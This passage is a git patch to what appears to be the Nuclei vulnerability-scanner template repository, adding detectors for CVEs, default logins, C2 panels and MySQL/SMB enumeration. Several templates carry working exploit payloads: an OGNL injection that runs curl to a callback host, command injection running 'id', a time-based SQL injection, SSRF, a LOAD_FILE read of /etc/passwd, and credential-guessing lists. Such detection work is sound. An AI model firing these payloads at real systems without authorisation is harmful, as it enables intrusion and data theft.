From faebc1af6a1eacfe81139916ae4d71a56814265d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 9 Mar 2024 14:23:42 +0000 Subject: [PATCH 01/13] Adding new templates from Unreleased Templates Repo --- http/cves/2023/CVE-2023-22527.yaml | 37 ++-- http/cves/2023/CVE-2023-6114.yaml | 37 ++++ http/cves/2023/CVE-2023-6567.yaml | 33 ++++ http/cves/2023/CVE-2023-6895.yaml | 46 ++--- http/cves/2023/CVE-2024-21893.yaml | 45 +++++ .../ispconfig-default-login.yaml | 61 +++++++ http/exposed-panels/c2/ares-rat-c2.yaml | 33 ++++ http/exposed-panels/c2/caldera-c2.yaml | 32 ++++ http/exposed-panels/c2/hack5-cloud-c2.yaml | 31 ++++ http/exposed-panels/c2/pupyc2.yaml | 32 ++++ http/exposed-panels/c2/supershell-c2.yaml | 33 ++++ .../esafenet/esafenet-mysql-fileread.yaml | 36 ++++ .../idoc/idocview-2word-fileupload.yaml | 30 ++++ http/vulnerabilities/idoc/idocview-lfi.yaml | 37 ++++ .../other/office365-indexs-fileread.yaml | 36 ++++ javascript/audit/mysql/mysql-load-file.yaml | 51 ++++++ .../smb/pop3/pop3-capabilities-enum.yaml | 40 +++++ .../enumeration/smb/rsync/rsync-version.yaml | 29 ++++ .../enumeration/smb/smb-default-creds.yaml | 46 +++++ .../enumeration/smb/smb-enum-domains.yaml | 41 +++++ javascript/enumeration/smb/smb-os-detect.yaml | 158 ++++++++++++++++++ .../enumeration/smb/smb-version-detect.yaml | 28 ++++ javascript/mysql/mysql-db-enum.yaml | 44 +++++ javascript/mysql/mysql-default-login.yaml | 44 +++++ javascript/mysql/mysql-show-variables.yaml | 45 +++++ javascript/mysql/mysql-user-enum.yaml | 47 ++++++ .../network/mysql/mysql-empty-password.yaml | 41 +++++ .../network/mysql/mysql-show-databases.yaml | 45 +++++ javascript/network/redis/redis-info.yaml | 39 +++++ .../network/redis/redis-require-auth.yaml | 29 ++++ javascript/network/smb/smb2-server-time.yaml | 38 +++++ ssl/c2/venomrat.yaml | 26 +++ 32 files changed, 1304 insertions(+), 46 deletions(-) create mode 100644 http/cves/2023/CVE-2023-6114.yaml create mode 100644 http/cves/2023/CVE-2023-6567.yaml create mode 100644 http/cves/2023/CVE-2024-21893.yaml create mode 100644 http/default-logins/ispconfig-default-login.yaml create mode 100644 http/exposed-panels/c2/ares-rat-c2.yaml create mode 100644 http/exposed-panels/c2/caldera-c2.yaml create mode 100644 http/exposed-panels/c2/hack5-cloud-c2.yaml create mode 100644 http/exposed-panels/c2/pupyc2.yaml create mode 100644 http/exposed-panels/c2/supershell-c2.yaml create mode 100644 http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml create mode 100644 http/vulnerabilities/idoc/idocview-2word-fileupload.yaml create mode 100644 http/vulnerabilities/idoc/idocview-lfi.yaml create mode 100644 http/vulnerabilities/other/office365-indexs-fileread.yaml create mode 100644 javascript/audit/mysql/mysql-load-file.yaml create mode 100644 javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml create mode 100644 javascript/enumeration/smb/rsync/rsync-version.yaml create mode 100644 javascript/enumeration/smb/smb-default-creds.yaml create mode 100644 javascript/enumeration/smb/smb-enum-domains.yaml create mode 100644 javascript/enumeration/smb/smb-os-detect.yaml create mode 100644 javascript/enumeration/smb/smb-version-detect.yaml create mode 100644 javascript/mysql/mysql-db-enum.yaml create mode 100644 javascript/mysql/mysql-default-login.yaml create mode 100644 javascript/mysql/mysql-show-variables.yaml create mode 100644 javascript/mysql/mysql-user-enum.yaml create mode 100644 javascript/network/mysql/mysql-empty-password.yaml create mode 100644 javascript/network/mysql/mysql-show-databases.yaml create mode 100644 javascript/network/redis/redis-info.yaml create mode 100644 javascript/network/redis/redis-require-auth.yaml create mode 100644 javascript/network/smb/smb2-server-time.yaml create mode 100644 ssl/c2/venomrat.yaml diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index d7d025c7bf..bcce43b020 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -1,29 +1,21 @@ id: CVE-2023-22527 info: - name: Atlassian Confluence - Remote Code Execution + name: Atlassian Confluence Unauthenticted Remote Code Execution author: iamnooob,rootxharsh,pdresearch severity: critical - description: | - A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. - Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. + description: |- + A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. reference: - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615 - https://jira.atlassian.com/browse/CONFSERVER-93833 - - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-22527 epss-score: 0.00044 - epss-percentile: 0.08115 - cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2023,confluence,rce,ssti + epss-percentile: 0.08185 + tags: cve,cve2023,confluence http: - raw: @@ -31,19 +23,18 @@ http: POST /template/aui/text-inline.vm HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate, br + Accept: */* Content-Type: application/x-www-form-urlencoded + Content-Length: 335 - label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"})) + label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"}) + matchers-condition: and matchers: + - type: word + part: body + words: + - 'Empty{name=' - type: dsl dsl: - - x_vuln_check != "" # check for custom header key exists - - contains(to_lower(body), 'empty{name=') - condition: and - - extractors: - - type: dsl - dsl: - - x_vuln_check # prints the output of whoami -# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "contains(interactsh_protocol, 'dns')" diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml new file mode 100644 index 0000000000..cf5fc0bef7 --- /dev/null +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-6114 + +info: + name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure + author: DhiyaneshDk + severity: high + description: | + The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site. + remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2. + reference: + - https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing + - https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1 + - https://nvd.nist.gov/vuln/detail/CVE-2023-6114 + - https://wpscan.com/plugin/duplicator/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-6114 + cwe-id: CWE-552 + epss-score: 0.00145 + epss-percentile: 0.50326 + cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:* + tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/backups-dup-lite/tmp/" + - "{{BaseURL}}/wp-content/backups-dup-pro/tmp/" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, '/tmp') && contains(body, 'Index of')" + condition: and diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml new file mode 100644 index 0000000000..f9e5eaf434 --- /dev/null +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -0,0 +1,33 @@ +id: CVE-2023-6567 + +info: + name: LearnPress <= 4.2.5.7 - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in version 4.2.5.8 + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by + - https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-6567 + classification: + cve-id: CVE-2023-6567 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/learnpress" + tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1" + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains_all(header, "lp_session_guest=", "application/json")' + - 'contains_all(body, "status\":\"success", "No courses were found")' + condition: and diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index b1fdac14f0..ae97042eb3 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -1,24 +1,20 @@ id: CVE-2023-6895 info: - name: Hikvision Intercom Broadcasting System - Command Execution - author: archer + name: Hikvision IP ping.php - Command Execution + author: DhiyaneshDk severity: critical - description: | - Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection. + description: A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. reference: - - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 - - https://github.com/Marco-zcl/POC - - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6895 cwe-id: CWE-78 epss-score: 0.0008 - epss-percentile: 0.32716 + epss-percentile: 0.33389 cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,31 +22,35 @@ info: vendor: hikvision product: intercom_broadcast_system fofa-query: icon_hash="-1830859634" - tags: cve,cve2023,rce,hikvision + tags: cve,cve2023,hikvision,rce http: - - raw: - - | - POST /php/ping.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest + - method: POST + path: + - "{{BaseURL}}/php/ping.php" + body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}" + headers: + Content-Type: "application/x-www-form-urlencoded" - jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}} + payloads: + command: + - 'id' + - 'cmd /c ipconfig' matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "dns" + - type: regex + part: body + regex: + - "Windows IP" + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + condition: or - type: word - part: body + part: header words: - - "TTL=" + - "text/html" - type: status status: - 200 -# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2024-21893.yaml b/http/cves/2023/CVE-2024-21893.yaml new file mode 100644 index 0000000000..d58f98dc69 --- /dev/null +++ b/http/cves/2023/CVE-2024-21893.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-21893 + +info: + name: Ivanti SAML - Server Side Request Forgery (SSRF) + author: DhiyaneshDk + severity: high + description: | + A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. + reference: + - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis + - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two + - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2024-21893 + cwe-id: CWE-918 + cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:* + metadata: + vendor: ivanti + product: connect_secure + shodan-query: "html:\"welcome.cgi?p=logo\"" + tags: cve,cve2024,kev,ssrf,ivanti + +http: + - raw: + - | + POST /dana-ws/saml20.ws HTTP/1.1 + Host: {{Hostname}} + + <?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope> + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: word + part: body + words: + - '/dana-na/' + - 'WriteCSS' + condition: and diff --git a/http/default-logins/ispconfig-default-login.yaml b/http/default-logins/ispconfig-default-login.yaml new file mode 100644 index 0000000000..e3cf05065c --- /dev/null +++ b/http/default-logins/ispconfig-default-login.yaml @@ -0,0 +1,61 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + shodan-query: http.title:"ispconfig" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /lgoin HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml new file mode 100644 index 0000000000..60ae43df94 --- /dev/null +++ b/http/exposed-panels/c2/ares-rat-c2.yaml @@ -0,0 +1,33 @@ +id: ares-rat-c2 + +info: + name: Area Rat C2 - Detect + author: pussycat0x + severity: info + description: | + Ares is a Python Remote Access Tool. + reference: + - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py + metadata: + verified: true + max-request: 1 + shodan-query: product:'Ares RAT C2' + tags: c2,ir,osint,ares,panel,rat + +http: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Ares' + - 'Passphrase:' + condition: and + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml new file mode 100644 index 0000000000..d2e0c7a0cb --- /dev/null +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -0,0 +1,32 @@ +id: caldera-c2 + +info: + name: Caldera C2 - Detect + author: pussycat0x + severity: info + description: | + MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response. + reference: + - https://github.com/mitre/caldera + - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py + metadata: + verified: true + max-request: 1 + fofa-query: http.favicon.hash:-636718605 + tags: c2,ir,osint,caldera,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login | CALDERA' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml new file mode 100644 index 0000000000..e40038d588 --- /dev/null +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml @@ -0,0 +1,31 @@ +id: hack5-cloud-c2 + +info: + name: Hack5 Cloud C2 - Detect + author: pussycat0x + severity: info + description: | + Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients. + reference: + - https://twitter.com/fofabot/status/1742737671037091854 + metadata: + verified: true + max-request: 1 + fofa-query: app="Hak5-C2" + tags: c2,ir,osint,hack5c2,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Hak5 Cloud C²' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml new file mode 100644 index 0000000000..b4194d8f88 --- /dev/null +++ b/http/exposed-panels/c2/pupyc2.yaml @@ -0,0 +1,32 @@ +id: pupyc2 + +info: + name: PupyC2 - Detect + author: pussycat0x + severity: info + description: | + Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory. + reference: + - https://twitter.com/TLP_R3D/status/1654038602282565632 + - https://github.com/n1nj4sec/pupy + metadata: + verified: true + max-request: 1 + shodan-query: aa3939fc357723135870d5036b12a67097b03309 + tags: c2,ir,osint,pupyc2,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Etag: "aa3939fc357723135870d5036b12a67097b03309"' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml new file mode 100644 index 0000000000..131e9e2d39 --- /dev/null +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -0,0 +1,33 @@ +id: supershell-c2 + +info: + name: Supershell C2 - Detect + author: pussycat0x + severity: info + description: | + Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload. + reference: + - https://twitter.com/S4nsLimit3/status/1693619836339859497 + - https://github.com/tdragon6/Supershell/blob/main/README_EN.md + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-1010228102" + tags: c2,ir,osint,supershell,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Supershell - 登录' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml new file mode 100644 index 0000000000..5d92c138af --- /dev/null +++ b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml @@ -0,0 +1,36 @@ +id: esafenet-mysql-fileread + +info: + name: Esafenet CDG mysql - File Read + author: DhiyaneshDk + severity: high + description: | + CDGServer3 Unauthorized File Download vulnerability is detected. + metadata: + verified: true + max-request: 1 + fofa-query: title="电子文档安全管理系统" + tags: esafenet,lfi,mysql + +http: + - method: GET + path: + - "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "varchar" + - "create table" + condition: and + + - type: word + part: header + words: + - "application/x-sql" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml new file mode 100644 index 0000000000..28fdcefb12 --- /dev/null +++ b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml @@ -0,0 +1,30 @@ +id: idocview-2word-fileupload + +info: + name: IDoc View /html/2word - Arbitrary File Upload + author: DhiyaneshDK + severity: high + metadata: + verified: true + max-request: 1 + fofa-query: title=="在线文档预览 - I Doc View" + tags: idoc,rce,instrusive,file-upload + +variables: + file: "{{to_lower(rand_text_alpha(5))}}" + +http: + - method: GET + path: + - "{{BaseURL}}/html/2word?url={{file}}" + + matchers-condition: and + matchers: + - type: word + part: response + words: + - "{{md5(file)}}.docx" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/idoc/idocview-lfi.yaml b/http/vulnerabilities/idoc/idocview-lfi.yaml new file mode 100644 index 0000000000..12ac44a85d --- /dev/null +++ b/http/vulnerabilities/idoc/idocview-lfi.yaml @@ -0,0 +1,37 @@ +id: idocview-lfi + +info: + name: IDoc View - Arbitrary File Read + author: DhiyaneshDK + severity: high + metadata: + verified: true + max-request: 1 + fofa-query: title=="在线文档预览 - I Doc View" + tags: idoc,lfi,file-read + +variables: + file: "{{to_lower(rand_text_alpha(5))}}" + +http: + + - method: GET + path: + - "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt" + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(content_type, 'application/json') + - contains_all(body, "ext", "srcUrl", "success", "md5") + condition: and + + extractors: + - type: regex + part: body + internal: true + name: filepath + group: 1 + regex: + - '"srcUrl":"\/([a-z/0-9_.]+)"' diff --git a/http/vulnerabilities/other/office365-indexs-fileread.yaml b/http/vulnerabilities/other/office365-indexs-fileread.yaml new file mode 100644 index 0000000000..ebb3013d26 --- /dev/null +++ b/http/vulnerabilities/other/office365-indexs-fileread.yaml @@ -0,0 +1,36 @@ +id: office365-indexs-fileread + +info: + name: OfficeWeb365 Indexs Interface - Arbitary File Read + author: DhiyaneshDK + severity: high + description: | + There is any file reading in the officeWeb365 Indexs interface. + reference: + - https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + shodan-query: "OfficeWeb365" + tags: officeweb365,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "for 16-bit app support" + + - type: word + part: body + words: + - "image/png" + + - type: status + status: + - 200 diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml new file mode 100644 index 0000000000..5fc8f03f36 --- /dev/null +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -0,0 +1,51 @@ +id: mysql-load-file +info: + name: MySQL LOAD_FILE - Enable + author: pussycat0x + severity: high + description: | + The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities. + reference: + - https://nmap.org/nsedoc/scripts/mysql-databases.html + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,network,audit,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + to_json(response); + + args: + Host: "{{Host}}" + Port: "3306" + Query: SELECT LOAD_FILE('/etc/passwd') + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - success == true + + - type: word + words: + - "root:x:" + + extractors: + - type: json + part: response + json: + - .Rows[] diff --git a/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml new file mode 100644 index 0000000000..aa3ee91fee --- /dev/null +++ b/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml @@ -0,0 +1,40 @@ +id: pop3-capabilities-enum + +info: + name: POP3 Capabilities - Enumeration + author: pussycat0x + severity: info + description: | + POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available. + reference: + - https://nmap.org/nsedoc/scripts/pop3-capabilities.html + metadata: + max-request: 1 + shodan-query: "port:110" + verified: true + tags: js,network,pop3,enum + +javascript: + - code: | + let data = "CAPA\r\n" + let c = require("nuclei/net"); + let conn = c.Open('tcp', `${Host}:${Port}`); + conn.Send(data); + let result = conn.RecvString(); + let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " "); + Export(cleanedData) + + args: + Host: "{{Host}}" + Port: 110 + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: dsl + name: + dsl: + - response diff --git a/javascript/enumeration/smb/rsync/rsync-version.yaml b/javascript/enumeration/smb/rsync/rsync-version.yaml new file mode 100644 index 0000000000..e986a8298d --- /dev/null +++ b/javascript/enumeration/smb/rsync/rsync-version.yaml @@ -0,0 +1,29 @@ +id: rsync-version + +info: + name: Rsync Version - Detect + author: DhiyaneshDK + severity: info + description: | + Identify the Version of the Rsync Protocol + metadata: + verified: true + max-request: 1 + shodan-query: port:"873" + tags: js,network,rsync,enum + +javascript: + - code: | + let m = require('nuclei/rsync'); + let c = m.RsyncClient(); + let response = c.IsRsync(Host,Port); + to_json(response); + + args: + Host: "{{Host}}" + Port: "873" + + extractors: + - type: json + json: + - .Banner diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml new file mode 100644 index 0000000000..3a33b9ab79 --- /dev/null +++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -0,0 +1,46 @@ +id: smb-default-creds + +info: + name: SMB Default Credential - Brutforcing + author: pussycat0x + severity: high + description: | + Attempts to guess username/password combinations over SMB. + reference: + - https://nmap.org/nsedoc/scripts/smb-brute.html + metadata: + verified: true + shodan-query: "port:445" + tags: js,network,smb,enum,default + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ListShares(Host, Port, User, Pass); + response; + + args: + Host: "{{Host}}" + Port: "445" + User: "{{usernames}}" + Pass: "{{passwords}}" + + attack: clusterbomb + payloads: + usernames: + - 'admin' + - 'administrator' + - 'guest' + passwords: + - 'admin' + - 'password' + - 'guest' + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'response != "[]"' + - 'success == true' + condition: and diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml new file mode 100644 index 0000000000..b5c21ace5a --- /dev/null +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -0,0 +1,41 @@ +id: smb-enum-domains + +info: + name: SMB - Enum Domains + author: DhiyaneshDK + severity: info + description: | + SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities. + reference: + - https://nmap.org/nsedoc/scripts/smb-enum-domains.html + metadata: + verified: true + max-request: 1 + shodan-query: port:445 + tags: 